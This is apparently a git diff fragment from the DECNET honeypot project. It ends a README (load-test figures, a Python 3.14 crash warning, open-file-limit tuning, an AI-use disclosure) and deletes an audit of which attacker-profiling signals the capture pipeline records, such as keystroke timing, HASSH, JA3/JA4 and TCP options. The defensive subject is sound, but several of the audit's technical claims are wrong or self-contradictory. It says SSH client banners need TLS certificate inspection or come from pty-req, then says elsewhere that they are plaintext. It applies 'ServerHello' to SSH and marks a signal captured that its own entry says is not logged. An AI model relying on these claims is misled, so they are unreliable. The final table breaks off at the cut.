- **Single-core pinning**: ~46 RPS with p95 near two minutes. Interesting
|
||||
as a "physics floor" datapoint — not a production config.
|
||||
|
||||
Top endpoints by volume: `/api/v1/attackers`, `/api/v1/deckies`,
|
||||
`/api/v1/bounty`, `/api/v1/logs/histogram`, `/api/v1/config`,
|
||||
`/api/v1/health`, `/api/v1/auth/login`, `/api/v1/logs`.
|
||||
|
||||
Notes on tuning:
|
||||
|
||||
- **Python 3.14 is currently a no-go for the API server.** Under heavy
|
||||
concurrent async load the reworked 3.14 GC segfaults inside
|
||||
`mark_all_reachable` (observed in `_PyGC_Collect` during pending-GC
|
||||
on 3.14.3). Stick to Python 3.11–3.13 until upstream stabilises.
|
||||
- Router-level TTL caches on hot count/stats endpoints (`/stats`,
|
||||
`/logs` count, `/attackers` count, `/bounty`, `/logs/histogram`,
|
||||
`/deckies`, `/config`) collapse concurrent duplicate work onto a
|
||||
single DB hit per window — essential to reach this RPS on one worker.
|
||||
- Turning off request tracing (`DECNET_TRACING=false`) is the next
|
||||
free headroom: tracing was still on during the run above.
|
||||
- On SQLite, `DECNET_DB_POOL_PRE_PING=false` skips the per-checkout
|
||||
`SELECT 1`. On MySQL, keep it `true` — network disconnects are real.
|
||||
|
||||
#### System tuning: open file limit
|
||||
|
||||
Under heavy load (500+ concurrent users), the server will exhaust the default Linux open file limit (`ulimit -n`), causing `OSError: [Errno 24] Too many open files`. Most distros default to **1024**, which is far too low for stress testing or production use.
|
||||
|
||||
**Before running stress tests:**
|
||||
|
||||
```bash
|
||||
# Check current limit
|
||||
ulimit -n
|
||||
|
||||
# Bump for this shell session
|
||||
ulimit -n 65536
|
||||
```
|
||||
|
||||
**Permanent fix** — add to `/etc/security/limits.conf`:
|
||||
|
||||
```
|
||||
* soft nofile 65536
|
||||
* hard nofile 65536
|
||||
```
|
||||
|
||||
Or for systemd-managed services, add `LimitNOFILE=65536` to the unit file.
|
||||
|
||||
> This applies to production deployments too — any server handling hundreds of concurrent connections needs a raised file descriptor limit.
|
||||
|
||||
# AI Disclosure
|
||||
|
||||
This project has been made with lots, and I mean lots of help from AIs. While most of the design was made by me, most of the coding was done by AI models.
|
||||
|
||||
Nevertheless, this project will be kept under high scrutiny by humans.
|
||||
|
||||
@@ -1,566 +0,0 @@
|
||||
# DECNET Capture Pipeline — Attacker-Profiling Signal Audit
|
||||
|
||||
**Date**: 2026-04-22
|
||||
**Scope**: v1 capture readiness for post-v1 profiler extraction
|
||||
**Methodology**: End-to-end verification (emission → transport → storage) for each signal against active code paths.
|
||||
|
||||
---
|
||||
|
||||
## Executive Summary
|
||||
|
||||
**Capture Status by Category**:
|
||||
|
||||
| Category | Captured | Partial | Not Captured | n/a |
|
||||
|----------|----------|---------|--------------|-----|
|
||||
| Session Environment | 0 | 1 | 3 | 0 |
|
||||
| Keystroke/Human | 0 | 2 | 6 | 2 |
|
||||
| SSH Transport | 2 | 2 | 2 | 0 |
|
||||
| Network/TCP | 3 | 2 | 5 | 0 |
|
||||
| TLS/L7 | 2 | 2 | 1 | 0 |
|
||||
| Aggregated/Derived | 0 | 0 | 5 | 0 |
|
||||
| **TOTAL** | **7** | **9** | **22** | **2** |
|
||||
|
||||
**Critical Pre-v1 Gaps** (blockers if signals are roadmap-committed):
|
||||
|
||||
1. **KEX algorithm ordering** — HASSH hash is stored, but raw `kex_algorithms` string is only emitted to syslog, not persisted to DB. Future extractor must parse syslog archives.
|
||||
2. **Per-keystroke timing** — Asciinema v2 `"i"` events with `t` timestamps are written to day-shard files on disk, but no database ingestion. Requires filesystem polling + parsing path.
|
||||
3. **TCP options order** — Captured in PCAP + sniffer logs (`options_sig`), but `options_sig` is a rolled-up signature string, not the raw per-connection sequence.
|
||||
4. **Terminal size (COLS×ROWS)** — Not captured from pty-req at all; would require SSH protocol-level interception.
|
||||
5. **SSH client version** — Server-side only sees RFC 4253 banner; full version string would require TLS cert inspection or prober modification.
|
||||
|
||||
**Biggest ROI capture improvements** (cheap, high-value):
|
||||
|
||||
1. Add `ssh_client_banner` column to Attacker table — capture SSH-2.0-* string from pty-req.
|
||||
2. Ingest asciinema keystroke timing into new `SessionProfile` table (v2 roadmap already designs this).
|
||||
3. Store raw KEX algorithm lists in `AttackerBehavior.kex_order_raw` (MEDIUMTEXT) instead of relying on syslog dedup.
|
||||
|
||||
---
|
||||
|
||||
## Per-Signal Classification
|
||||
|
||||
### Per-Session Environment (SessionProfile candidates)
|
||||
|
||||
#### TERM environment variable
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH server can read TERM from pty-req; emitted in syslog by `emit_capture.py` if implemented.
|
||||
- **Current path**: Not found in active code path. Check `decnet/templates/ssh/emit_capture.py` or syslog bridge.
|
||||
- **Missing**: Database column in a `SessionProfile` table; no structured ingestion.
|
||||
- **Cheap fix**: Modify SSH syslog bridge to emit `session_event` with `term=<value>`. Create `SessionProfile` table with `session_term` TEXT column.
|
||||
- **Priority**: V2 backlog (nice-to-have for human vs. automation, low discriminative power).
|
||||
|
||||
#### LANG / LC_ALL
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Server-side locale is baked into container image, not attacker-controlled. Attacker's client locale is not visible over SSH.
|
||||
- **Priority**: defer (non-capturable from server vantage point).
|
||||
|
||||
#### SSH client version string (full SSH-2.0-OpenSSH_9.2p1…)
|
||||
- **Status**: `partial`
|
||||
- **Where**: RFC 4253 banner string is transmitted in plaintext before encryption. Sniffer could capture it from TCP stream; prober `hassh.py` captures server banner (lines 58–101), not client.
|
||||
- **Missing**: Client-side banner capture. Sniffer would need TCP stream reconstruction to pluck the SSH banner from the raw payload.
|
||||
- **Cheap fix**: Extend sniffer to parse SSH banners from TCP stream (before TLS/encryption); emit `ssh_client_banner` event. Store in Attacker.`ssh_client_banners` (JSON list).
|
||||
- **Priority**: v1 blocker if client-profiling is committed. Currently partial via TLS fingerprint fallback.
|
||||
|
||||
#### Terminal size (COLS × ROWS)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: SSH pty-req extension carries `terminal mode` (COLS, ROWS, speeds); server-side sshd parses this but does not log it by default. Would require patching sshd or intercepting at the protocol layer.
|
||||
- **Missing**: No access to pty-req payload without protocol-level instrumentation.
|
||||
- **Cheap fix**: Patch SSH entrypoint to log pty-req to syslog before accepting the request (requires custom OpenSSH build).
|
||||
- **Priority**: V2 backlog (interesting for typing-space reconstruction, but not blocky).
|
||||
|
||||
---
|
||||
|
||||
### Per-Session, Keyboard/Human (SessionProfile candidates)
|
||||
|
||||
#### Per-keystroke timing (t in asciinema "i" events)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sessrec pipeline (`decnet/templates/ssh/sessrec/`) writes asciinema v2 day-shards with per-keystroke `"i"` (input) events carrying `t` (timestamp in seconds since session start). Files on disk: `/var/lib/decnet/session_recordings/<decky>/<date>.json` (or similar).
|
||||
- **Missing**: No ingestion into database. Extractors must read asciinema files from filesystem and parse the `"i"` event stream post-hoc.
|
||||
- **Cheap fix**: Ingest keystroke timing stream into new `SessionProfile` table (design already in DEVELOPMENT_V2.md). Add job to parse day-shard files on rotation and compute IKI moments, burst ratio, etc.
|
||||
- **Priority**: v1 blocker if keystroke dynamics is roadmap-committed. Data exists but not queryable.
|
||||
|
||||
#### Control-character stream (backspace, ^W, ^U, ^C, ^D, arrows, tab)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Asciinema captures every keystroke as UTF-8/control byte in `"i"` events. Raw byte sequence is preserved.
|
||||
- **Missing**: Same as above — files on disk, no DB ingestion. Future extractor can parse control bytes from the `"data"` field of each `"i"` event.
|
||||
- **Cheap fix**: Same as keystroke timing — ingest asciinema events and compute `kd_ctrl_*` rates in SessionProfile.
|
||||
- **Priority**: v2 (depends on SessionProfile schema).
|
||||
|
||||
#### Inter-command think time (prompt-return to next-command-start gap)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires prompt boundary detection in the asciinema stream (heuristic: line ending in `$` or `#` + pause > 100ms). No active code marks prompts.
|
||||
- **Missing**: Prompt-boundary markers in asciinema. Would require ML or regex-based post-processing.
|
||||
- **Cheap fix**: Add prompt-regex configuration + marker injection during sessrec playback, or post-hoc analysis over asciinema.
|
||||
- **Priority**: V2 (interesting but requires heuristic or attacker-side annotation).
|
||||
|
||||
#### Pause before sensitive commands
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires command-boundary detection (typing a full command, then detecting gap before Enter). Asciinema captures this timing, but no code marks command boundaries.
|
||||
- **Missing**: Command-line parsing + gap detection logic.
|
||||
- **Cheap fix**: Off-line analysis: parse `"i"` events, detect Enter (`\r`), measure gap before Enter. Correlate with command content from `"o"` (output) events.
|
||||
- **Priority**: V2 backlog (post-extraction analysis; interesting for psychological profiling).
|
||||
|
||||
#### Command n-grams
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH service logs individual commands to syslog when pty input is detected. Attacker.`commands` JSON array stores seen commands (but coarse-grained per service/decky, not per-session).
|
||||
- **Missing**: Per-session, per-command sequencing. No n-gram bigrams/trigrams computed.
|
||||
- **Cheap fix**: Parse asciinema `"i"` + `"o"` stream to extract full command lines, store as JSON list in SessionProfile.`cmd_sequence` or new `SessionCommand` table.
|
||||
- **Priority**: V2 (foundation for command chaining fingerprint).
|
||||
|
||||
#### Flag preferences (ls -la vs ls -al, ps -ef vs ps aux)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Asciinema records the **typed** command line exactly, but no code parses flag ordering or normalizes commands for pattern comparison.
|
||||
- **Missing**: Canonical command parsing + flag-order extraction.
|
||||
- **Cheap fix**: Off-line: regex-parse commands from asciinema, extract flag sequences, compute n-grams over flag positions.
|
||||
- **Priority**: V2 (cheap post-processing, good human-vs-tool separator).
|
||||
|
||||
#### Typo patterns (suod, sl)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Asciinema records corrected command line after backspacing, not the raw keystrokes with typos visible.
|
||||
- **Example**: typing `suod<backspace>` then `ddo<backspace>` then `o` shows as `sudo` in `"o"` output; the intermediate typos are **visible** in the `"i"` event stream but require careful keystroke-by-keystroke parsing.
|
||||
- **Missing**: Raw keystroke stream parsing to detect backspace/correction patterns.
|
||||
- **Cheap fix**: Parse `"i"` events, reconstruct line state keystroke-by-keystroke, log (typed_text, final_text) pairs to detect corrections.
|
||||
- **Priority**: V2 (unique human fingerprint, but requires manual asciinema parsing).
|
||||
|
||||
#### Editor choice (vi/vim/nano/ed)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Command launch (`vi`, `nano`, `ed`) is visible in asciinema `"i"` + `"o"` stream and captured in Attacker.`commands`.
|
||||
- **Missing**: No aggregation of editor invocations or time-in-editor statistics.
|
||||
- **Cheap fix**: Post-process commands, count editor launches, extract editor type. Could add to AttackerBehavior.`preferred_editor` or new SessionProfile.`editor_used`.
|
||||
- **Priority**: V2 (behavioral signal, low priority).
|
||||
|
||||
#### Shell history usage (!!,!$, ^old^new, fc)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Command input stream captures the actual invocation (if attacker types `!!`, it's visible in `"i"`). Output `"o"` shows the expanded command.
|
||||
- **Missing**: No parsing of history expansion syntax; requires post-processing to identify `!` / `^` patterns.
|
||||
- **Cheap fix**: Regex-scan asciinema input for shell history operators; count occurrences.
|
||||
- **Priority**: V2 (interesting tool-chain signal, but low volume).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, SSH Transport (AttackerBehavior candidates)
|
||||
|
||||
#### HASSH / HASSHServer
|
||||
- **Status**: `captured`
|
||||
- **Where**: Prober (`decnet/prober/hassh.py`) computes HASSHServer fingerprint; stored as `Attacker.fingerprints` JSON list (generic bounty store). Also emitted to syslog by prober worker.
|
||||
- **Note**: Roadmap says `[x]` (captured); verified in code at lines 244–252 of `hassh.py`.
|
||||
- **Storage**: `Attacker.fingerprints` (JSON list of `{type, value, ...}` dicts); not per-attacker-behavior, but queryable.
|
||||
- **Priority**: ✓ captured; v2: consider normalizing to `AttackerBehavior.hassh_server` for faster lookup.
|
||||
|
||||
#### KEX algorithm preference ORDER (beyond HASSH hash)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sniffer logs raw `kex_algorithms`, `encryption_s2c`, `mac_s2c`, `compression_s2c` strings to syslog in `tls_session` and `tcp_syn_fingerprint` events (fingerprint.py lines 240–252).
|
||||
- **Missing**: Stored in **syslog only**, not in DB. Attacker table has `fingerprints` (bounty store) but no dedicated `kex_order_raw` column.
|
||||
- **Path to recovery**: Read syslog archives and parse `kex_algorithms` field. But this is not queryable at scale.
|
||||
- **Cheap fix**: Add `Attacker.kex_order_raw` (MEDIUMTEXT, JSON string list) and `kd_kex_order_hash` (similar to digraph simhash). Populate during sniffer event ingestion.
|
||||
- **Priority**: v1 blocker if KEX ordering is committed to roadmap (currently only hash stored, raw data must be re-parsed from syslog).
|
||||
|
||||
#### Public key comment field
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: SSH key comment is part of the OpenSSH wire format (only transmitted if key auth is used). Server-side sshd does not log it by default; would require PAM/auth hook instrumentation.
|
||||
- **Missing**: No interception of public key authentication payloads.
|
||||
- **Cheap fix**: Patch SSH server to emit auth_pubkey event with key comment extracted from wire format. Or use `net.ssh` library instrumentation.
|
||||
- **Priority**: V2 backlog (valuable for key reuse fingerprinting, but rare).
|
||||
|
||||
#### Private key type advertised (Ed25519 / RSA / ECDSA)
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH transport carries key type in the public key authentication message. Sniffer cannot decode this (traffic is encrypted after ServerHello). Server-side sshd doesn't log it.
|
||||
- **Missing**: Requires either passive PCAP of SSH-TRANSPORT (not available; encrypted) or server-side auth hook.
|
||||
- **Cheap fix**: Patch sshd to emit `auth_pubkey_type` event during authentication.
|
||||
- **Priority**: V2 (interesting but lower signal than key comment).
|
||||
|
||||
#### Agent forwarding requested?
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Agent forwarding is negotiated via SSH_MSG_SERVICE_REQUEST → ssh-userauth → "ssh-agent@openssh.com" extension. Encrypted after KEX.
|
||||
- **Missing**: Would require decrypting SSH transport or instrumenting sshd auth hook.
|
||||
- **Cheap fix**: Sshd can detect `SSH_AUTH_SOCK` or SSH_AGENT_FWD service request; add to syslog.
|
||||
- **Priority**: V2 (useful for lateral-movement detection).
|
||||
|
||||
#### Channel multiplexing pattern
|
||||
- **Status**: `partial`
|
||||
- **Where**: SSH service logs each command separately. Channel open/close events could be tracked, but no code currently does.
|
||||
- **Missing**: Per-session channel state machine (open channels, their types, lifetime).
|
||||
- **Cheap fix**: Instrument sshd or use SSH_MSG_CHANNEL_OPEN events in syslog to track simultaneous channels.
|
||||
- **Priority**: V2 (rare; most attackers use sequential commands).
|
||||
|
||||
#### SSH_CLIENT / SSH_CONNECTION environment variables
|
||||
- **Status**: `captured`
|
||||
- **Where**: SSH server **always** sets `SSH_CLIENT` and `SSH_CONNECTION` in the child shell. Server-side user code (bashrc, commands) can read them. If attacker runs `echo $SSH_CLIENT`, it's visible in asciinema output.
|
||||
- **Missing**: No **automatic** logging of these vars. Requires parsing asciinema for intentional queries or patching sshd to emit them.
|
||||
- **Cheap fix**: Patch SSH PAM or auth hook to log `SSH_CLIENT` on successful auth. Or parse asciinema for `echo $SSH_*` commands.
|
||||
- **Priority**: V2 (low value; mostly redundant with src_ip already in logs).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, Network/Transport (AttackerBehavior candidates)
|
||||
|
||||
#### TCP timestamp clock skew (Kohno 2005)
|
||||
- **Status**: `partial`
|
||||
- **Where**: PCAP contains TCP timestamps (if present). Sniffer code extracts MSS, window size, options (fingerprint.py line 77–94). TCP options include timestamp flag (`has_timestamps`).
|
||||
- **Missing**: Raw timestamp values (`opt_value` for "Timestamp" in scapy) are NOT extracted. Only boolean `has_timestamps` flag is stored. To compute clock skew, need timestamp values across multiple packets.
|
||||
- **Path to recovery**: Raw PCAP analysis (if PCAPs are retained on disk). Each TCP packet has `[TCP option: Timestamp x, y]` which can be parsed post-hoc.
|
||||
- **Cheap fix**: Extend sniffer to extract timestamp sequence numbers and RTT deltas. Store as per-flow timing summary in `tcp_flow_timing` event (which already captures flow metrics).
|
||||
- **Priority**: V2 (requires PCAP or extended sniffer capture; useful for OS fingerprinting).
|
||||
|
||||
#### TCP ISN generator characteristics
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: ISN is visible in PCAP (TCP seq number on SYN). Sniffer code tracks flow seqs for retransmit detection (line 850) but does not extract the initial SYN seq across multiple connections to analyze ISN patterns.
|
||||
- **Missing**: No per-connection ISN logging. Would need to roll up ISN sequences across multiple SYNs to the same port.
|
||||
- **Cheap fix**: On every SYN, log `syn_seq` in `tcp_syn_fingerprint` event. Post-hoc analysis can compute randomness metrics.
|
||||
- **Priority**: V2 backlog (weak signal; ISN randomization is standard on modern OS).
|
||||
|
||||
#### TCP options ordering in SYN
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sniffer extracts `options_sig` (line 87) via `_extract_options_order()` from scapy TCP options. This is a **signature string** (e.g., `"MSS,WScale,SAckOK,Timestamp"`).
|
||||
- **Missing**: The signature is **aggregated**; we don't store the raw per-packet ordering. Also, `options_sig` is deduplicated in logs (only one event per unique signature per dedup window).
|
||||
- **Path to recovery**: Raw PCAP analysis or re-parsing sniffer logs to extract the signature. But the signature is a good enough feature for OS fingerprinting.
|
||||
- **Cheap fix**: Store `tcp_fingerprint` JSON in AttackerBehavior with raw options list (not just signature). Current schema (models.py line 174–177) only stores aggregated `{window, wscale, mss, options_sig}`.
|
||||
- **Priority**: v1 improvement (low effort, already have options_sig; add raw list).
|
||||
|
||||
#### Initial congestion window ramp-up
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires detailed TCP state machine tracking (SYN, SYN-ACK, ACK sequence with packet sizes). Sniffer tracks `packets` count and `bytes` total per flow (line 844–868), but not per-packet sequence or ACK-clock dynamics.
|
||||
- **Missing**: Per-packet payload sizes and ACK timing.
|
||||
- **Cheap fix**: Extend `tcp_flow_timing` event to include per-packet sizes (as JSON list) or CWND estimation from ACK patterns.
|
||||
- **Priority**: V2 backlog (very niche; useful for Reno vs. Cubic vs. BBR detection, but rare in honeypot context).
|
||||
|
||||
#### Retransmit timing and backoff
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer tracks `retransmits` count per flow (lines 873–877, 922). Emitted in `tcp_flow_timing` event. No **timing** of retransmits, only count.
|
||||
- **Missing**: Timing deltas between retransmit pairs (RTO, exponential backoff pattern).
|
||||
- **Path to recovery**: Raw PCAP; sequence numbers in `tcp_flow_timing` are not logged.
|
||||
- **Cheap fix**: Extend event to include retransmit timing deltas (list of RTOs).
|
||||
- **Priority**: V2 (useful for network condition inference; low value on honeypots).
|
||||
|
||||
#### MTU / path-MTU discovery behavior
|
||||
- **Status**: `partial`
|
||||
- **Where**: Sniffer tracks per-flow byte counts (line 868); can infer effective MSS from packet sizes. TCP fingerprint includes extracted MSS (line 77–94, emitted in `tcp_syn_fingerprint`).
|
||||
- **Missing**: No multi-flow MTU tracking or ICMP fragmentation-needed response detection. Would require ICMP processing.
|
||||
- **Cheap fix**: Log ICMP unreachable (frag needed) events separately; correlate with TCP flows to infer PMTUD behavior.
|
||||
- **Priority**: V2 backlog (VPN detection is interesting but niche).
|
||||
|
||||
#### Packet pacing (microsecond-resolution egress timing)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Sniffer computes mean/min/max inter-arrival time in milliseconds (lines 904–906), not microseconds. Modern pacing requires sub-millisecond precision.
|
||||
- **Missing**: Sniffer uses `time.monotonic()` (typically millisecond granularity on Linux); would need OS-level timing hooks or PCAP with hardware timestamps.
|
||||
- **Cheap fix**: Upgrade sniffer to use PCAP timestamps (pcap.ts_resolution) if available; log microsecond-resolution inter-packet gaps.
|
||||
- **Priority**: V2 backlog (requires infrastructure upgrade; marginal value on honeypots).
|
||||
|
||||
#### Window scaling multipliers
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer extracts `wscale` from TCP options (line 80); stored in `tcp_fingerprint` JSON and emitted in `tcp_syn_fingerprint` event.
|
||||
- **Storage**: AttackerBehavior.`tcp_fingerprint` (JSON: `{window, wscale, mss, ...}`); queryable.
|
||||
- **Priority**: ✓ captured (sufficient for OS fingerprinting and congestion algorithm inference).
|
||||
|
||||
#### ECN negotiation
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: ECN is signaled via TCP flags (CWR, ECE) and the SYN's TCP options. Scapy's TCP layer does not expose ECN flags in the options extraction.
|
||||
- **Missing**: No code to parse ECN negotiation from TCP header.
|
||||
- **Cheap fix**: Extend TCP fingerprint extraction to check for ECN flag bits.
|
||||
- **Priority**: V2 backlog (rarely used; low value).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, L7 (TLS/HTTP)
|
||||
|
||||
#### TLS fingerprint (JA3/JA4)
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer fingerprint engine computes JA3/JA3S/JA4/JA4S (lines 565–662); emitted in syslog and stored in `Attacker.fingerprints` (bounty store).
|
||||
- **Storage**: Logs are queryable; fingerprints stored as JSON in bounty table (generic).
|
||||
- **Roadmap**: `[x]` JA3/JA3S, `[x]` JA4+. Verified in code.
|
||||
- **Priority**: ✓ captured (good).
|
||||
|
||||
#### TLS session resumption behavior
|
||||
- **Status**: `captured`
|
||||
- **Where**: Sniffer extracts resumption mechanisms (session_ticket, PSK, early_data, session_id) in `_session_resumption_info()` (lines 675–689). Emitted in `tls_client_hello` event.
|
||||
- **Storage**: Logged to syslog; `Attacker.fingerprints` stores resumption=`[mechanism list]`.
|
||||
- **Priority**: ✓ captured (good).
|
||||
|
||||
#### HTTP/2 SETTINGS frame ordering + values
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: HTTP/2 is encrypted (after TLS handshake). Sniffer cannot see plaintext SETTINGS frames.
|
||||
- **Missing**: Would require decryption (not viable passively) or attacker-side TLS instrumentation.
|
||||
- **Cheap fix**: Instrument HTTP/2 services (h2c, HTTP/2 over plain TCP on rare deployments) or use TLS key log for offline analysis.
|
||||
- **Priority**: defer (not capturable from passive vantage point).
|
||||
|
||||
#### HTTP/2 stream prioritization
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Encrypted in TLS.
|
||||
- **Missing**: Same as above.
|
||||
- **Priority**: defer (not capturable).
|
||||
|
||||
#### HTTP header ordering
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Inside encrypted TLS. Sniffer cannot see plaintext HTTP headers.
|
||||
- **Missing**: Would require server-side HTTP request logging (not implemented).
|
||||
- **Cheap fix**: Instrument HTTP service to log raw header order in syslog.
|
||||
- **Priority**: V2 (useful for bot/tool detection, but requires service-level capture).
|
||||
|
||||
#### Cookie handling behavior (expiry, domain scope)
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Encrypted TLS + requires HTTP state machine tracking (Set-Cookie responses vs. Cookie requests).
|
||||
- **Missing**: Would need server-side HTTP middleware or browser instrumentation.
|
||||
- **Cheap fix**: Add cookie jar logging to HTTP service (track which attacker cookies were accepted, rejected, resent).
|
||||
- **Priority**: V2 (behavioral signal; interesting but niche).
|
||||
|
||||
---
|
||||
|
||||
### Per-Attacker, Aggregated/Derived (would live in new `AttackerAggregate` table)
|
||||
|
||||
#### Time-of-day activity distribution (chronotyping)
|
||||
- **Status**: `partial`
|
||||
- **Where**: Log entries have `timestamp` (datetime). All events are timestamped. Can compute hour-of-day histogram post-hoc.
|
||||
- **Missing**: No aggregation table or computed features. Would live in new AttackerAggregate.
|
||||
- **Cheap fix**: Batch job: group events by attacker + hour-of-day, compute distribution histogram. Store as JSON or new table.
|
||||
- **Priority**: V2 (simple aggregation; good for clustering).
|
||||
|
||||
#### Session duration distribution
|
||||
- **Status**: `partial`
|
||||
- **Where**: SessionProfile schema (DEVELOPMENT_V2.md) includes `session_duration_s`. Asciinema files are per-decky-per-day, so duration can be computed.
|
||||
- **Missing**: No SessionProfile table yet; no aggregation of durations across sessions.
|
||||
- **Cheap fix**: Implement SessionProfile table + compute per-attacker duration histogram in AttackerAggregate.
|
||||
- **Priority**: V2 (depends on SessionProfile; good for behavioral clustering).
|
||||
|
||||
#### Recon-to-action ratio
|
||||
- **Status**: `partial`
|
||||
- **Where**: Profiler already computes recon vs. exfil phase sequencing (behavioral.py lines 52–62, 188–191). Stored in `AttackerBehavior.phase_sequence` (JSON: `{recon_end, exfil_start, latency}`).
|
||||
- **Missing**: No per-attacker ratio column in AttackerAggregate. Would be simple division: `exfil_events / recon_events`.
|
||||
- **Cheap fix**: Compute ratio in profiler job; store in new AttackerAggregate or as extension to AttackerBehavior.
|
||||
- **Priority**: V2 (low effort; useful for threat level scoring).
|
||||
|
||||
#### Lateral movement style
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires graph traversal (attacker hopping between deckies). Correlation engine (correlation/engine.py) should track this, but no explicit "lateral movement style" feature (sequential vs. parallel, target selection heuristic).
|
||||
- **Missing**: No code analyzing lateral movement pattern (which deckies were touched, in what order, dwell time per decky).
|
||||
- **Cheap fix**: Extend CorrelationEngine to build per-attacker decky traversal graph; compute metrics (average dwell time, fan-out ratio, revisit frequency).
|
||||
- **Priority**: V2 (interesting; requires traversal graph extraction from correlation engine).
|
||||
|
||||
#### Persistence-first vs. exfil-first
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires semantic tagging of events (is this persistence activity? exfil activity?). Profiler has `EXFIL_EVENT_TYPES` (line 59–62) but no persistence catalog.
|
||||
- **Missing**: No code to classify persistence attempts (cron jobs, reverse shells, privilege escalation).
|
||||
- **Cheap fix**: Add PERSISTENCE_EVENT_TYPES list; compute persistence_start vs. exfil_start timestamps; store in AttackerBehavior or AttackerAggregate.
|
||||
- **Priority**: V2 (requires event taxonomy; valuable for threat classification).
|
||||
|
||||
#### Tool-chain ordering
|
||||
- **Status**: `partial`
|
||||
- **Where**: Profiler logs tool guesses in AttackerBehavior.`tool_guesses` (line 183, behavioral.py lines 76–105). Tools are matched by beacon timing + header patterns.
|
||||
- **Missing**: No **ordering** — tools are listed but not sequenced by first-appearance time.
|
||||
- **Cheap fix**: Sort tool_guesses by first event timestamp; store as ordered list. Compute tool transition graph (tool A → tool B over time).
|
||||
- **Priority**: V2 (interesting; small extension to existing tool attribution).
|
||||
|
||||
#### Error-response psychology
|
||||
- **Status**: `not_captured`
|
||||
- **Why**: Requires analyzing how attacker reacts to failures (e.g., retry frequency after auth failure, command error recovery). Would need per-command success/failure tracking.
|
||||
- **Missing**: No error-categorization in logs; would need service-level event typing (auth_failure vs. auth_success, exec_error vs. exec_success).
|
||||
- **Cheap fix**: Extend service events to include success/failure indicators; compute attacker error-response metrics (retry rate, time-to-recovery, behavior change after error).
|
||||
- **Priority**: V2 backlog (niche; good for human vs. bot discrimination).
|
||||
|
||||
---
|
||||
|
||||
## Table Recommendations
|
||||
|
||||
### `AttackerBehavior` — Current & Recommended Additions
|
||||
|
||||
**Currently captured** (verified in models.py lines 161–194):
|
||||
- `tcp_fingerprint` (JSON) — window, wscale, mss, options_sig
|
||||
- `timing_stats` (JSON) — mean/median/stdev/min/max IAT
|
||||
- `phase_sequence` (JSON) — recon_end, exfil_start latency
|
||||
- `tool_guesses` (JSON list)
|
||||
- `beacon_interval_s`, `beacon_jitter_pct`
|
||||
- `behavior_class` (beaconing | interactive | scanning | …)
|
||||
|
||||
**Recommended additions for v1 (pre-v2, no schema bump)**:
|
||||
- `kex_order_raw` (MEDIUMTEXT, JSON list) — raw KEX algorithm strings from HASSH
|
||||
- `tls_fingerprints_full` (MEDIUMTEXT, JSON) — full JA3/JA4 raw strings, not just hashes
|
||||
- `ssh_client_banners` (MEDIUMTEXT, JSON list) — capture from TCP stream
|
||||
|
||||
**Reserved for v2**:
|
||||
- See SessionProfile below.
|
||||
|
||||
### `SessionProfile` — New Table (v2 roadmap in DEVELOPMENT_V2.md)
|
||||
|
||||
Design is already specified (lines 71–104). Implement in v1 as empty table + stubbed write path, ready for feature extraction post-v1.
|
||||
|
||||
**Columns** (from DEVELOPMENT_V2.md):
|
||||
- `sid` (TEXT PK)
|
||||
- `log_id` (FK to logs)
|
||||
- `schema_version` (INT, required for federation gossip)
|
||||
- Timing features: `kd_iki_mean`, `kd_iki_stdev`, `kd_iki_p50`, `kd_iki_p95`, `kd_enter_latency_p50`, `kd_enter_latency_p95`
|
||||
- Ratio features: `kd_burst_ratio`, `kd_think_ratio`
|
||||
- Control-char rates: `kd_ctrl_backspace`, `kd_ctrl_wkill`, `kd_ctrl_ukill`, `kd_ctrl_abort`, `kd_ctrl_eof`, `kd_arrow_rate`, `kd_tab_rate`
|
||||
- `kd_digraph_simhash` (BLOB, 8 bytes)
|
||||
- Derived: `total_keystrokes`, `session_duration_s`, `created_at`
|
||||
|
||||
**Note**: All keystroke-timing values are derivable from existing asciinema day-shard files on disk. Implement ingestion job in v2 (not v1 blocker).
|
||||
|
||||
### `AttackerAggregate` — New Table (v2+)
|
||||
|
||||
Columns (suggested):
|
||||
- `attacker_uuid` (PK, FK to attackers)
|
||||
- `activity_dist_by_hour` (JSON) — histogram of event counts by UTC hour
|
||||
- `session_duration_dist` (JSON) — percentiles of session durations
|
||||
- `recon_to_action_ratio` (REAL)
|
||||
- `lateral_movement_graph` (JSON) — decky traversal (src → dst edges with dwell times)
|
||||
- `tool_sequence` (JSON list) — tools in chronological order
|
||||
- `is_persistent` (BOOL) — persistence activity detected?
|
||||
- `updated_at` (TIMESTAMP)
|
||||
|
||||
---
|
||||
|
||||
## Full Per-Signal Capture Table
|
||||
|
||||
| Signal | Status | Where Captured | What's Missing | Cheap Fix | Priority |
|
||||
|--------|--------|-----------------|-----------------|-----------|----------|
|
||||
| **Session Environment** |
|
||||
